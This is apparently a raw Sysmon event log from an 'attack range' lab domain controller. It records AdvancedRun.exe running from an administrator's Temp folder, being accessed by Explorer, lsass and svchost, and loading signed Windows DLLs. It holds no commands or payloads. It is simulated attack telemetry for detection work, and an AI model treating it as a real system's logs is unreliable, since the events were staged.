10341000x80000000000000003949373Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.952{834264DD-DB11-61EA-9500-000000002702}4285520C:\Windows\Explorer.EXE{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003949372Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.952{834264DD-DB11-61EA-9500-000000002702}4285280C:\Windows\Explorer.EXE{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003949371Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.952{834264DD-DB11-61EA-9500-000000002702}4285520C:\Windows\Explorer.EXE{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003949370Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.952{834264DD-DB11-61EA-9500-000000002702}4285280C:\Windows\Explorer.EXE{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003949369Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.952{834264DD-DB11-61EA-9500-000000002702}4285280C:\Windows\Explorer.EXE{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003949366Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.952{834264DD-DB11-61EA-9500-000000002702}4285280C:\Windows\Explorer.EXE{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003949365Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.937{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003949364Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.937{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003949363Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.937{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003949362Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.937{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003949361Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.937{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003949360Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.937{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000003949359Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.843{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949358Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.843{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949357Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.781{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949356Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.781{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949355Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.781{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949354Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.781{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003949353Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.781{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003949352Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.781{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003949351Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.781{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003949350Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.781{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003949349Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949348Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949347Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949346Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949345Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949344Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949343Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949342Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949341Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949340Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949339Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949338Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949337Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949336Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949335Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003949334Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:27:26.765{834264DD-ECFE-61EA-6503-000000002702}1432C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 